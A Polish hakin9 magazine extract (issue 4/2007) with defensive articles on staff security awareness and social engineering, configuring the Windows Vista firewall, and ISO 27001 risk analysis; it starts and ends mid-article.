Człowiek – najsłabsze ogniwo

hakin9 Nr 4/2007

www.hakin9.org

Obrona

pieczeństwo  i  niezawodność  sieci
informatycznej  i  systemów.  A  więc
ryzyko  zostało  przeniesione  na  fir-
mę  zewnętrzną.  Zakładamy  przy
tym,  że  każdy  pracownik  zna  na-
zwę  firmy,  która  obsługuje  jego  or-
ganizację  od  strony  IT.  Z  doświad-
czenia  można  powiedzieć,  że  ok.
80% użytkowników bez wahania od-
powie  na  każde  pytanie,  włączając
w  to  podanie  swojego  hasła,  oso-
bie,  która  zadzwoni  i  przedstawi
się  jako  pracownik  firmy  świadczą-
cej tą usługę i właśnie próbuje usu-
nąć awarię.

Innym przykładem, kiedy użyt-

kownicy zareagują podobnie, a więc
nie  zweryfikują  i  nie  sprawdzą,  czy
osoba jest właśnie tą osobą, za któ-
rą się podaje jest sytuacja, kiedy to
osoba atakująca podaje się za funk-
cjonariusza policji, czy choćby za ko-
mornika  sądowego.  W  takim  przy-
padku  atakującemu  zależeć  może
w  szczególności  na  danych  osobo-
wych, a procent użytkowników, któ-
rzy  udostępnią  chronione  dane  bę-
dzie podobny.

Takich przykładów można mno-

żyć bardzo wiele. Wszystkie one
powinny być omawiane na szkole-
niach. Każdy użytkownik może bar-
dzo dobrze wiedzieć, co mu, wolno
a czego nie, zgodnie z polityką bez-

pieczeństwa,  ale  zareagować  na
dane zdarzenie może zupełnie ina-
czej. Odpowiednia reakcja w każdej
sytuacji  niestandardowej,  budzącej
wątpliwości,  musi  być  zatem  świa-
doma i wyuczona. Omawianie kon-
kretnych  zdarzeń  nauczy  też  użyt-
kownika  identyfikować  te  niestan-
dardowe  sytuacje,  które  potencjal-
nie  mogą  być  szkodliwe  dla  firmy.
Zauważalny  jest  fakt,  że  w  przy-
padku,  kiedy  użytkownik  ma  świa-
domość,  jak  ważne  są  dane,  które
przetwarza i wie, że musi je chronić,
to przy wystąpieniu zdarzenia, któ-
re według jego oceny może być pró-
bą  ataku,  a  nie  wie  jak  ma  się  za-
chować, w pierwszej kolejności, za-
nim cokolwiek zrobi, zgłosi się o po-
moc do CSO.

Inaczej jest wówczas, kiedy mu-

simy  chronić  firmowe  tajemnice
przed celowym udostępnieniem nie-
powołanym osobom. Występowanie
takich zdarzeń jest tak samo praw-
dopodobne  jak  zdarzenia  opisywa-
ne wcześniej. Bardzo często słyszy-
my  o  przypadkach,  kiedy  to  firma
konkurencyjna  podkupiła  pracow-
nika,  który  udostępnia  na  życzenie
odpowiednie  bazy  danych  lub  ści-
śle  strzeżone  receptury.  Innym  za-
grożeniem tego typu może być nie-
zadowolony  lub  właśnie  zwolnio-

ny z pracy pracownik, który w ra-
mach zemsty modyfikuje, albo usu-
wa wrażliwe dane.

Budowanie świadomości w tym

wypadku  musi  koncentrować  się
na  wiedzy  personelu  dotyczącej
konsekwencji dyscyplinarnych oraz
prawnych w wyniku naruszenia za-
sad zarządzania bezpieczeństwem
informacyjnym. Organizacje próbu-
ją się zabezpieczyć przed celowym
działaniem użytkownika na szkodę
firmy na różne sposoby. Wykorzy-
stują  między  innymi  oprogramo-
wanie  monitorujące  wszystkie  ko-
piowane  pliki  na  różnego  rodza-
ju  nośniki  zewnętrzne,  czy  naka-
zują  podpisanie  przez  pracownika
zobowiązania  do  zachowania  ta-
jemnicy  służbowej.  Stosują  zasa-
dy  poufności,  czyli  pracownik  ma
dostęp tylko do danych do których
jest upoważniony, oraz rozliczalno-
ści.  Regularne  szkolenia  mają  na
celu  także  podtrzymanie  świado-
mości. W związku z tym CSO po-
winien tak ułożyć program szkole-
nia,  żeby  pracownicy  mogli  sobie
odświerzyć  to,  co  już  znają.  Przy
tym nie mogą się nudzić, ponieważ
może to doprowadzić do zlekcewa-
żenia  problemów  bezpieczeństwa.
Jeśli chodzi o szkolenie kadry za-
rządzającej  może  to  skutkować
tym, że na następne szkolenie nikt
z kierownictwa nie znajdzie czasu.
Program  nie  może  być  jednakowy
dla  wszystkich.  Powinien  być  inny
dla  kierownictwa,  inny  dla  admini-
stratorów sieci, informatyków, inny
dla kluczowych użytkowników apli-
kacji,  a  jeszcze  inny  dla  pracow-
ników  portierni  czy  osób  sprząta-
jących.

Podtrzymywanie

świadomości

poza  formą  spotkań  szkoleniowych
można dodatkowo realizować na inne,
również skuteczne sposoby. Dobrym
rozwiązaniem jest umieszczanie w fir-
mowych  biuletynach  lub  intranecie,
wewnętrznym  portalu  firmy,  wszel-
kich informacji związanych z bezpie-
czeństwem  informacyjnym,  np.  opisy
prób włamania się do sieci, jeśli takie
miało miejsce. W jaki sposób atakują-
cy  chcieli  wykraść  informacje,  jak  to
udaremniono, kto się do tego przyczy-

Rysunek 2.

Świadomość i technologia

Świadomość zagrożeń i potrzeby ochrony informacji.

nił itp. Serwis taki powinien być dodat-
kowo wsparty przez kadrę zarządza-
jącą w postaci artykułów pochwalnych
dla pracowników, którzy odpowiednio
zareagowali na zdarzenie. Pozosta-
li pracownicy z ciekawością przeczy-
tają kto, i za co został wyróżniony, czy
nagrodzony. Takie zdarzenia powinny
być nagłaśniane.

Innym sposobem podtrzymywania

świadomości może być wykorzystanie
do tego celu systemu e-learning, - o
ile jest on w danej organizacji wdrożo-
ny – poprzez tworzenie szkoleń koń-
czących się egzaminem. W tym przy-
padku każdy użytkownik uczestniczy
w szkoleniu w dowolnym dla siebie
czasie, może je w każdym momencie
powtórzyć i na koniec zdać egzamin,
co jest dobrym sprawdzianem wiedzy.
Taki system jest często stosowany w
dużych przedsiębiorstwach. W mniej-
szych natomiast CSO bardzo często
posługuje się szkoleniami indywidu-
alnymi. Polega to na spotkania z jed-

nym, lub małą grupką pracowników i
rozmowach na temat zasad bezpie-
czeństwa dotyczących konkretnego
stanowiska pracy.

Dużą popularnością cieszą się

projekcje filmów na temat bezpieczeń-
stwa. Często jest to frajda dla pracow-
ników siedzących wiele godzin przed
komputerem.  Frajda,  ale  z  pożytecz-
nym  skutkiem.  Filmy  takie  pokazu-
ją konkretne zdarzenia, luki, sposoby
działania  szpiegów  gospodarczych,
socjotechników. Pracownik zauważa-
jąc  pewne  podobieństwa  charakte-
ru swojej pracy z tym, co zobaczył na
filmie  szybko  zaczyna  zdawać  sobie
sprawę, że atak może nastąpić w każ-
dym momencie i że ofiarą może być
nawet on sam. Niezależnie od tego,
jakie sposoby budowania świadomo-
ści CSO stosuje w każdym przypad-
ku,  choćby  niewielkie  wsparcie  od
strony  kadry  zarządzającej  odgry-
wa bardzo dużą rolę. Nawet krótkie
wystąpienie Dyrektora przed szkole-
niem zachęcające do udziału w nim
od razu zmienia jego rangę.

Jak widać budowanie świadomo-

ści  nie  jest  zadaniem  prostym.  Wy-
maga  od  CSO  dużych  zdolności  dy-
daktycznych  i  odpowiedniego  podej-
ścia  do  ludzi.  Musi  umieć  przekonać
do siebie i do pojęcia bezpieczeństwa
każdego bez wyjątku pracownika, a w

szczególności kadrę zarządzającą.

Aby zbudowanie odpowiedniej

świadomości  personelu  było  możli-
we,  CSO  musi  również  swoją  wie-
dzę  nieustannie  poszerzać,  być  na
bieżąco  z  zagadnieniami  związany-
mi z bezpieczeństwem, uczestniczyć
w  szkoleniach,  konferencjach,  śle-
dzić fachową prasę.

Dobrze jest, jeśli swoją wiedzę

potwierdza  renomowanymi  certyfi-
katami, co pomoże w budowaniu od-
powiedniej  pozycji  w  firmie.  Może
być dzięki temu coraz lepiej postrze-
gany  w  środowisku  kierownictwa  i
całego  personelu.  Zabezpieczenia
techniczne i proceduralne są bardzo
istotne  i  konieczne,  ale  dopiero  po-
łączone z odpowiednim przeszkole-
niem  i  wysoką  świadomością  użyt-
kowników  znacznie  usprawnia  się
poziom  bezpieczeństwa  informacyj-
nego w przedsiębiorstwie.

Okazuje się, że nie bez powodu

człowieka  uważa  się  na  najsłabszy
punkt w całym systemie zarządzania
bezpieczeństwem w organizacji. Pro-
ces kształcenia użytkownika jest dłu-
gotrwały  i  wymaga  bardzo  wielkiego
zaangażowania  ze  strony  CSO  i  ka-
dry  zarządzającej.  Czasami  wystar-
czy,  że  jeden  z  elementów  całej  po-
lityki  uświadamiania  nie  funkcjonuje
odpowiednio, aby nie udało się osią-
gnąć zamierzonych celów. l

O autorze

Główny Specjalista ds. Bezpieczeństwa
IT w jednej z Agencji Rządowych. Od 5
lat zajmuje się zagadnieniami związany-
mi z bezpieczeństwem informacji.
Kontakt z autorem: kuczynski.a@gma-
il.com

www.hakin9.org

hakin9 Nr 4/2007

Obrona

zy jesteśmy w stanie przypomnieć so-
bie, jak wyglądała nasza praca z kom-
puterami kilkanaście lat temu, gdzie

na rynku dominował system operacyjny DOS,
OS/2 oraz Windows   3.0/3.1, a następnie po-
czątki  Windows  95?  Jak  wyglądała  dystry-
bucja  oprogramowania  oraz  jak  wyglądało
bezpieczeństwo  naszych  komputerów,  o  ile
w  ogóle  mogliśmy  mówić  o  ich  bezpieczeń-
stwie? Korzystaliśmy wówczas głównie z ha-
seł zakładanych na BIOS, a nasze aplikacji pi-
saliśmy  tak,  aby  zawierały  ekran  do  logowa-
nia.  Zagrożeń  zewnętrznych  w  zasadzie  nie
było, ponieważ większość osób nie była pod-
łączona do Internetu i nikt poza nami nie miał
dostępu do naszego komputera (pomijam sy-
tuacje,  kiedy  ktoś  fizycznie  siadał  przed  na-
szym  komputerem  w  pracy  czy  w  domu).  In-
ternet  jest  obecny  dzisiaj  w  każdej  dziedzi-
nie  naszego  życia  prywatnego  i  zawodowe-
go. Dzięki niemu mamy dostęp do różnorod-
nych  informacji,  aplikacji,  usług.  Internet  jest
również jednym z największych zagrożeń bez-
pieczeństwa naszych komputerów. Ilość infor-
macji, która przepływa przez nasze kompute-
ry jest ogromna i jest to największe zagroże-
nie. Nie jesteśmy bowiem w stanie przeanali-

zować tych wszystkich informacji pod wzglę-
dem bezpieczeństwa. Dodatkowym ryzykiem
jest fakt, że nasze komputery są podpięte do
sieci prawie przez cały czas, a co za tym idzie
narażone są na ataki z zewnątrz. Będąc na-
rażonym na różnego rodzaju włamania, wi-
rusy, robaki i wszelkie inne zagrożenia liczy-
my na to, że system operacyjny będzie w sta-
nie nas obronić. Wiadome jest, że nasz sys-

Zapora systemu

Windows Vista - a złudne

bezpieczeństwo systemu

Artur Żarski

stopień trudności

Czym jest zapora w systemie operacyjnym i jakie ma podstawowe

znaczenie? Artykuł ma na celu przedstawienie Windows Firewall

w systemie operacyjnym Vista, odpowiedzieć na pytanie jakie

są podstawowe komponenty oraz w jaki sposób zabrać się

do zabezpieczeń naszego komputera przed niepowołanym

dostępem.

Z artykułu dowiesz się...

• artykuł ma na celu pokazanie konieczności ko-

rzystania z firewall’a na swoim komputerze oraz
zagrożeń wynikających z braku jego posiada-
nia,

• publikacja pokazuje co jest nowego w systemie

bezpieczeństwa Vista

Co powinieneś wiedzieć...

• znajomość zasad bezpieczeństwa systemów

operacyjnych w szczególności informacji o sys-
temach firewall,

• wiedza na temat protokołów komunikacyjnych,

filtrów oraz reguł.

Zapora systemu Windows Vista

hakin9 Nr 4/2007

www.hakin9.org

tem operacyjny nie będzie zawierał
kompletu oprogramowania, np. pro-
gramu  antywirusowego,  ale  będzie
za to w stanie odeprzeć podstawo-
we  ataki  z  sieci.  Jednym  z  najbar-
dziej powszechnych nieporozumień
dotyczących  bezpieczeństwa  infor-
macji  jest  myśl,  że  systemy  i  apli-
kacje mogą być wykonane jako cał-
kowicie bezpieczne. Mogłoby to być
prawdą,  gdybyśmy  mogli  usunąć
element  ludzki,  ale  niestety  przy
potencjalnych  błędach,  tak  w  pro-
gramowaniu,  jak  i  przy  działaniach
użytkownika,  całkowicie  bezpiecz-
ny  system  będzie  nadal  narażony
na  pewne  ryzyko.  W  dzisiejszym
świecie  całkowicie  nierealistycz-
ne  jest  założenie,  że  jakikolwiek
system  jest  całkowicie  bezpieczny.
Wystarczająco  umotywowani  ha-
kerzy  zawsze  będą  szukać  sposo-
bów na ominięcie zabezpieczeń.  W
przypadku  wykorzystywania  Inter-
netu  dodatkowo  myślimy  często  o
tym, że naszym głównym i jedynym
sprzymierzeńcem jest zapora (ang.
firewall).  Łączenie  się  z  Internetem
bez zapory firewall przypomina po-
zostawienie samochodu z kluczyka-
mi w stacyjce i otwartymi drzwiami i
udanie się na zakupy. Można oczy-
wiście zrobić zakupy i wrócić, zanim
ktoś to zauważy, ale równie dobrze

ktoś  może  wykorzystać  nadarzają-
cą się okazję. W Internecie działają
hakerzy, którzy za pomocą złośliwe-
go kodu, np. wirusów, robaków i ko-
ni trojańskich, próbują znaleźć nie-
zabezpieczone  komputery.  Zapora
firewall  może  pomóc  w  zabezpie-
czeniu komputera przed tymi i inny-
mi  atakami  zagrażającymi  bezpie-
czeństwu danych. O to jakie są ro-
dzaje zapór:

• filtrujące - monitorują przepły-

wające przez nie pakiety siecio-
we i przepuszczają tylko te, któ-
re są zgodne z regułami usta-
wionymi na danej zaporze (za-

pora pracująca dodatkowo jako
router).

• oprogramowanie

komputerów

stacjonarnych  -  udostępnia  wy-
brane  porty  do  połączeń  "z  ze-
wnątrz"  monitorując  ruch,  udo-
stępnia  także  połączenia  na  ze-
wnątrz  komputera  wybranym
usługom/programom.

Często

zintegrowane z ochroną antywi-
rusową.

• zapory pośredniczące (proxy)

-  wykonujące  połączenie  z  ser-
werem  w  imieniu  użytkowni-
ka.  Przykładowo,  zamiast  uru-
chomienia  sesji  http  bezpośred-
nio do zdalnego serwera WWW,
uruchamiana jest sesja z zaporą
i  dopiero  stamtąd  uruchamiane
jest połączenie z systemem zdal-
nym.  Cała  komunikacja  na  ser-
wer http przechodzi przez proxy,
które może filtrować ruch.

Windows Firewall

W tym miejscu dochodzimy do sed-
na  tematu  –  przyjrzyjmy  się  zapo-
rze  ogniowej  w  systemie  Vista  oraz
jej  ustawieniom.  Bezpieczeństwo  w
systemie  Vista  jest  podstawowym
elementem  wyróżniającym  ten  sys-
tem od jego poprzedników. W syste-
mie Vista firewall posiada dwa inter-
fejsy użytkownika. Pierwszy z nich to
klasyczne okno konfiguracji przezna-
czone  dla  mniej  zaawansowanych
użytkowników, bazujące na poprzed-
niej wersji zapory (Rysunek 1),

Drugi natomiast przeznaczony

jest do szerokich możliwości konfi-

Rysunek 1.

Interfejs zapory dla początkujących

Rysunek 2.

Interfejs konfiguracji firewall dostępny poprzez MMC

hakin9 Nr 4/2007

www.hakin9.org

Obrona

guracji i kierowany do zaawansowa-
nych użytkowników systemu (Rysu-
nek 2.).

Pierwszy z interfejsów dostępny

jest z Panelu Sterowania w opcjach
bezpieczeństwa  (Security  Center),
do  drugiego  natomiast  możemy  do-
stać  się  poprzez  konsolę  MMC,  lub
też  poprzez  konsolę  Local  Security
Policy dostępną w Panel Sterowania
->  Narzędzia  Administracyjne.  Kon-
figuracja  jest  również  dostępna  po-
przez linię komend i polecenie netsh
advfirewall.

Włączenie konsoli pozwoli nam

nie  tylko  na  konfigurację  Windows
Firewall  dla  lokalnej  stacji,  ale  rów-
nież  na  konfigurację  zdalną  innych
komputerów  poprzez  Group  Policy.
Wszystkie  funkcje  Firewalla  są  zin-
tegrowane z ustawieniami IPSec (In-
ternet  Protocol  security),  redukując
przez  to  możliwość  konfliktów  po-
między  dwoma  mechanizmami  za-
bezpieczeń.  Windows  Firewall  with
Advanced  Security,  bo  tak  nazywa
się w pełni nowy Windows Firewall,
wspiera możliwość rozdzielenia pro-
fili,  gdy  komputer  jest  włączony  do
domeny  lub  do  np.  sieci  publicznej.
Nowa zapora wspiera dodatkowo ob-
sługę reguł dla Active Directory, ru-
chu  IP,  portów  IP,  ustawień  ICMP,
ustawień IPSec oraz różnych innych
specyficznych interfejsów i usług.

W Tabeli 1. znajduje się zesta-

wienie najważniejszych funkcjonal-
ności, poprawionych oraz nowo do-
danych.

W Tabeli 1. znajduje się zesta-

wienie najważniejszych poprawio-
nych funkcjonalności oraz nowo do-
danych.

Kolejność

wykonywania reguł

Windows Firewall with Advanced Se-
curity wspiera następujące typy re-
guł:

• Windows Service Hardening.
• Reguły bezpieczeństwa połą-

czeń.

•  Reguły autentykacji
•  Reguły blokujące
•  Reguły zezwalające
•  Reguły standardowe

Tabela 1.

Zestawienie najważniejszych funkcjonalności Windows Firewall w

systemie Vista

Funkcjonalność

Opis

Windows Service
Hardening

Windows Service Hardening pomaga chro-
nić krytyczne usługi system Windows przed
użyciem ich przez złośliwe oprogramowanie
w systemie plików, rejestrach czy sieci. Jeśli
firewall wykryje nienormalne zachowanie ja-
kieś usługi wtedy ją blokuje.Dodatkowo mo-
żemy określić, że dany serwis może zapi-
sywać tylko do okreslonego miejsca w sys-
temie plikó lub rejestrów opartych o Access
Control Lists (ACL).

Granularne reguły

Standardowo Windows Firewall jest włączo-
ny dla obu wchodzących i wychodzących
połączeń. Standardowe polisy blokują więk-
szość połączeń przychodzących i pozwala-
ją na połączenia wychodzące. W przypad-
ku zaawansowanych ustawień możliwe jest
dodatkowe definiowanie reguł dla połączeń
przychodzących i wychodzących. Windows
Firewall with Advanced Security dodatkowo
wspiera filtrowanie dowolnej ilości protoko-
łów, gdy poprzednia wersja wspierała tylko
filtrowanie UTP, TCP oraz ICMP.

Filtrowanie połączeń
wychodzących

Windows Firewall pozwala na zarządzanie fil-
trowaniem połączeń wychodzących. Pozwala
to na określenie, które aplikacje dopuszczone
są do generowania ruchu w sieci.

Różne profile

Możliwe jest konfigurowanie różnych reguł
i ustawień dla różnych profili. Do dyspozycji
mamy następujące profile:

Domain (Domena) - Używane podczas połą-
czenia komputera do domeny Active Direc-
tory, której dany komputer jest członkiem.

Private (Prywatne) - Używane kiedy kompu-
ter podpięty jest do prywatnej sieci za wła-
sną bramą lub routerem. Tylko użytkownik z
uprawnieniami administracyjnymi może de-
sygnować daną sieć jako prywatną.

Public (Publiczna) – Używana kiedy komputer
podłączony jest bezpośrednio do internetu lub
dowolnej innej sieci, która nie została zazna-
czona jako domena lub prywatna.

Wspracie dla
Active Directory

Możliwe jest stworzenie reguł firewall, któ-
re filtrować będą połączenia użytkowni-
ka, komputera lub grupy w Active Directo-
ry. Dla tego typu reguł połączenie musi być
zabezpieczone przy użyciu IPSec używa-
jąc uprawnień, którymi możliwe jest przesy-
łanie informacji o koncie np. Kerberos wer-
sja 5 (v5).

Wsparcie dla IPv6

Windows Firewall with Advanced Security w
pełni wspiera czyste środowisko Ipv6

Zapora systemu Windows Vista

hakin9 Nr 4/2007

www.hakin9.org

Rysunek  3.  przedstawia  kolejność
wykonywania  poszczególnych  reguł
przez  Windows  Firewall.  Kolejność
ta jest zawsze zachowana i wykony-
wana, nawet jeśli reguły pochodzą z
Group Policy.

Reguły, włączając te z Group Po-

licy,  są  sortowane,  a  następnie  za-
stosowywane.  Administratorzy  do-
meny  mogą  pozwolić  lub  zabronić
administratorom  lokalnym  na  two-
rzenie nowych reguł.

Konfigurowanie

właściwości firewalla

Aby  rozpocząć  konfigurację  naszej
zapory  uruchamiamy  opcję  właści-
wości  Windows  Firewall.  Zostanie
uruchomione okienko z Rysunku 4.

Zaraz po uruchomieniu zobaczyć

można trzy dostępne profile oraz
konfigurację IPSec. Aktualny status
pracy zapory możemy zobaczyć po-
przez zamknięcie okienka i przejście
do widoku głównego konsoli (Rysu-
nek 6.).

W tym przypadku, pomimo że sa-

ma  zapora  jest  włączona,  nie  jest
ona do końca skonfigurowana. Więk-
szość  ustawień  ma  standardowe
właściwości,  co  może  spowodować
potencjalne zagrożenie. W kolejnych
opcjach  możemy  ustawić  poszcze-
gólne reguły.

Przeglądanie reguł dostępne

jest z menu w opcjach „reguły przy-
chodzące”  oraz  „reguły  wychodzą-
ce”.  W naszym przypadku nie mamy
jeszcze zdefiniowanych żadnych re-
guł. Tworzenie nowych reguł również
odbywa się z lewego panelu widoku
głównego.  Mamy  możliwość  utwo-
rzenia następujących typów reguł:

• Reguły dla programów – po-

zwala na połączenie tylko kon-
kretnym programem. Żaden in-
ny program nie będzie mógł ko-
rzystać z sieci. Identyfikacja
następuje po wskazaniu ścież-
ki i pliku uruchomieniowego dla
danego programu.

• Reguły dla portów – ten typ re-

guł pozwala kontrolować ruch dla
poszczególnych numerów por-
tów TCP lub UDP lub też wybra-
nego zakresu.

• Reguły predefiniowalne – Win-

dows zawiera kilkadziesiąt funkcji
systemu,  które  możemy  włączyć,
np.  udostępnianie  plików  i  druka-
rek,  zdalny  dostęp.  Wybierając
predefiniowaną regułę pozwalamy
danej usłudze na dostęp do sieci.

• Reguły własne – pozwalają na

tworzenie pozostałych reguł, któ-
rych nie dało się zrobić lub uru-
chomić regułami standardowymi.

Jak utworzyć regułę? Wykonujemy
to w kilku krokach. W naszej konso-

Rysunek 3.

Kolejność wykonywania poszczególnych reguł

Rysunek 4.

Konfiguracja zapory

hakin9 Nr 4/2007

www.hakin9.org

Obrona

li na liście klikamy w reguły przycho-
dzące  lub  reguły  wychodzące  i  wy-
bieramy  opcję  nowa  reguła.  Uka-
że się okienko, jak na Rysunku 6, w
którym  wybieramy  typ  naszej  regu-
ły,  a  następnie  przechodzimy  przez
wszystkie  kroki  kreatora,  który  pro-
wadzi nas przez poszczególne usta-
wienia.

Dostęp z linii poleceń

Bardzo przydatnym narzędziem jest
polecenie  Netsh  Advfirewall,  które
dostępne  jest  z  linii  poleceń.  Dzięki
niemu  możemy  skonfigurować  nasz
firewall  bez  potrzeby  uruchamia-
nia  aplikacji  okienkowych.  W  syste-
mie Vista używając polecenia netsh

możliwe  jest  tworzenie  skryptów  do
automatycznej konfiguracji ustawień
Windows  Firewall,  tworzenia  reguł,
monitorowania  połączeń,  a  także
wyświetlania statusu całej zapory.

Po wydaniu polecenia netsh ad-

vfirewall mamy do dyspozycji nastę-
pujące polecenia:

• Export/Import – eksportuje lub

importuje aktualne polisy zapory
do lub z pliku.

• Help – wyświetla listę dostęp-

nych poleceń.

• Reset – przywrócenie standardo-

wych ustawień.

• Set file – kopiuje zawartość kon-

soli do pliku.

• Set machine – zmienia maszynę,

którą aktualnie konfigurujemy.

• Show allprofiles/domainprofile/

privateprofile/publicprofile – wy-
świetlenie ustawień dla wybrane-
go profilu.

Podsumowanie

Windows Firewall w systemie Win-
dows  Vista  jest  zaporą,  która  po-
zwala  na  blokowanie  przychodzą-
cych  i  wychodzących  połączeń.
Użytkownicy,  którzy  są  mniej  za-
awansowani  w  konfiguracji  zapory
systemu mogą nadal używać stare-
go  i  znanego  narzędzia  dostępne-
go w Panelu Sterowania. Użytkow-
nicy  bardziej  zaawansowani  mają
do  dyspozycji  całą  konsolę  MMC,
która pozwala na bardzo dokładne
i  bardzo  szczegółowe  ustawienia.
Dodatkowo nowe opcje firewalla są
teraz  zintegrowane  z  IPSec.  Win-
dows Firewall with Advanced Secu-
rity pracuje również z Network Lo-

cation Awareness (NLA), który po-
zwala na stosowanie ustawień bez-
pieczeństwa  bazując  na  typie  sie-
ci,  do  którego  podpięty  jest  kom-
puter. Musimy jednak znać zasady
połączeń sieciowych, mieć podsta-
wową  znajomość  protokołów  i  ca-
łej masy innych ustawień, które są
konieczne  do  tego,  aby  zabezpie-
czyć się przed intruzami. Nieumie-
jętne oraz niedokładne korzystanie
z ustawień zapory może przynieść
nam  więcej  szkody  niż  pożytku.
Czasami  warto  jest  po  prostu  po-
zostawić  standardowe  ustawienia
i unikać miejsc w sieci, które mogą
spowodować włamanie do naszego
komputera. l

Rysunek 6.

Widok główny konsoli

Rysunek 5.

Dostępne typy reguł

O autorze

Autor  jest  pracownikiem  firmy  Micro-
soft Polska. Pracuje na stanowisku De-
weloper Evangelist w dziale Developer
Evangelist  w  dziale  Developer  &  Plat-
form Group. Zajmuje się bazami dany-
ych,  hurtowniami  danych  oraz  rozwią-
zaniami  portalowymi  w  oparciu  o  na-
rzędzia Microsoft.
Kontakt z autorem: arturz@micro-
soft.com

www.hakin9.org

hakin9 Nr 4/2007

Obrona

a częsta praktyka może doprowadzić
do sytuacji, w której nie będzie można
poradzić sobie z daną katastrofą lub in-

cydentem, ponieważ nie będzie zdefiniowane-
go logicznego i przemyślanego planu postę-
powania z ryzykiem.

Będziemy się wtedy zastanawiać nie tyl-

ko, co zrobić, ale dlaczego dany incydent w
ogóle  mógł  mieć  miejsce.  Sami  wtedy  doj-
dziemy do wniosku, że być może nie zostały
zdefiniowane i zastosowane odpowiednie za-
bezpieczenia,  lub  same  procesy  nie  zostały
dokładnie  przeanalizowane  pod  kątem  bez-
pieczeństwa.

Podstawą każdego wdrożenia Systemu

Zarządzania Bezpieczeństwem Informacji jest
przede wszystkim sprawnie przeprowadzona
i przemyślana analiza ryzyka. Jest ona punk-
tem wyjściowym do dostosowania polityki
bezpieczeństwa do faktycznych potrzeb i real-
nych zagrożeń dla danej organizacji.

Sama norma ISO 27001 wymaga od

przedsiębiorstwa, zdefiniowania i przeanalizo-
wania potencjalnego ryzyka i wybrania na je-
go podstawie odpowiednich metod zabezpie-
czeń. Jednak sama analiza ryzyka to później-
szy etap.

Krok pierwszy – wybór metody

Pierwsze  kroki  przy  rozpoczęciu  całego  pro-
cesu  analizy  ryzyka  to  wybór  odpowiedniej
metody jego przeprowadzenia i dobranie od-
powiednio  przeszkolonego  personelu.  Wśród
specjalistów  zaangażowanych  w  prace  nad
analizą  ryzyka  powinni  znaleźć  się  członko-
wie zarządu firmy, dyrektorowie pionów, dzia-
łów,  informatycy  oraz  pracownicy  ochrony  fi-
zycznej.  Wspólnie  określają  oni  poziom  ak-
ceptowanego  ryzyka  oraz  podatność  przed-
siębiorstwa na nie. Przed rozpoczęciem prac
nad  analizą  ryzyka,  powinny  zostać  sklasyfi-
kowane  informacje  oraz  aktywa  je  przetwa-
rzające,  przechowujące  i  niszczące  informa-
cje. Należy również zdefiniować tzw. „obsza-
ry bezpieczne”, w których znajdują się strate-

Analiza ryzyka – Zarządza-

nie Bezpieczeństwem

Informacji

Tomasz Polaczek

stopień trudności

Częstym błędem przy wdrażaniu polityki bezpieczeństwa

informacji w rozmaitych organizacjach, jest szybkie i

powierzchowne podejście do problemów. Bardziej oparte na

intuicji, niż wynikające z przemyślanych analiz incydentów, czy

innych zdarzeń mających wpływ na zachwianie bezpieczeństwa

zarówno informacji, jak i IT.

Z artykułu dowiesz się...

• czym jest analiza ryzyka,
• dlaczego jest tak ważnym procesem przy

wdrażaniu sprawnego Systemu Zarządzanie
Bezpieczeństwem Informacji. Sprawnie prze-
prowadzona, z odpowiednią grupą osób z or-
ganizacji, jest podstawą bezpieczeństwa.

System Zarządzania Bezpieczeństwem Informacji

hakin9 Nr 4/2007

www.hakin9.org

giczne  dane  organizacji,  sprzęt  in-
formatyczny  oraz  pracownicy,  któ-
rych  brak  lub  odejście  z  firmy  mo-
że  spowodować  wypłynięcie  waż-
nych danych lub zachwianie ciągło-
ści  działania.  Ważne  jest  również
określenie  właścicieli  danych  infor-
macji i aktywów.

Krok drugi –

identyfikacja zagrożeń

Następnie  przychodzi  czas  na  do-
kładną identyfikację zagrożeń i po-
datności na nie dla każdego ze skla-
syfikowanych  aktywów,  informacji,
obszarów  oraz  ludzi.  Istotne  jest,
aby  identyfikacja  dotyczyła  real-
nych,  prawdopodobnych  zagrożeń,
na  jakie  może  zostać  narażona  or-
ganizacja. Po tak dokładnej identy-
fikacji,  określa  się  skutki  potencjal-
nych katastrof.

Określając skutki wystąpienia

katastrofy możemy w prosty sposób
przejść do wyboru odpowiednich za-
bezpieczeń w postaci sprzętu, opro-
gramowania,  procesów,  procedur
oraz  polityk.  Wybór  zabezpieczeń
na podstawie przeprowadzonej ana-
lizy  znacznie  wpływa  na  zminimali-
zowanie kosztów wdrożenia tych za-
bezpieczeń oraz na jego czas. Jeśli
w analizie zostaną określone ryzyka
krytyczne, to bardzo ważne  dla da-
nej organizacji jest jak najszybsze je-
go zmniejszenie do poziomu akcep-
towalnego.

Po oszacowaniu skutków wystą-

pienia ryzyka, należy też oszacować
hipoteczną wielkość szkód, jakie mo-
że spowodować dana katastrofa.

Krok trzeci -

prawdopodobieństwo

W  następnym  etapie,  gdy  mamy
już  oszacowane  ewentualne  skut-
ki  i  szkody  spowodowane  wystą-
pieniem  katastrofy,  należy  określić
prawdopodobieństwo ich wystąpie-
nia. Dla niektórych obszarów, akty-
wów,  procesów,  prawdopodobień-
stwo to może być wysokie z uwagi
na  niezastosowanie  w  tych  obsza-
rach żadnych zabezpieczeń, lub za-
stosowanie  słabych,  niewystarcza-
jących  i  nie  adekwatnych  do  waż-
ności  samego  zagadnienia.  Poja-

wią  się  też  obszary,  aktywa,  infor-
macje,  gdzie  prawdopodobieństwo
będzie  bardzo  małe;  zabezpiecze-
nia mogą już istnieć, być odpowied-
nie  i  wystarczające,  co  w  dużym
stopniu zmniejsza ryzyko wystąpie-
nia  katastrofy.  Jednak  nawet  mimo
wystąpienia  małego  prawdopodo-
bieństwa, należy zawsze zachować
czujność i na bieżąco monitorować
obszary,  aktywa,  informacje,  ludzi
wymienionych w analizie ryzyka.

Same ryzyka możemy podzielić

na cztery grupy:

•   Ryzyko akceptowalne
•   Ryzyko akceptowalne czasowo
•   Ryzyko nieakceptowane
•   Ryzyko krytyczne

Dla  każdego  z  nich  możemy  zało-
żyć  odpowiednie  ramy  czasowe,  w
których musimy dane ryzyko zmniej-
szyć lub tylko monitorować - w przy-
padku ryzyka akceptowalnego. Moż-
na  założyć  sobie  następujący  sce-
nariusz.

Ryzyko akceptowalne – nie są

podejmowane żadne działania, jest
ono monitorowane podczas przeglą-
du SZBI.

Ryzyko akceptowalne warunko-

wo – Forum Zarządzania Bezpie-
czeństwem Informacji decyduje, czy

zostaną podjęte działania korygujące
i zapobiegawcze, zależy to od orga-
nizacji pracy oraz kosztów zabezpie-
czeń. Jeżeli nie są wymagane dzia-
łania korygujące lub zapobiegawcze
to stosowane są zabezpieczenia z
załącznika A normy ISO 27001, de-
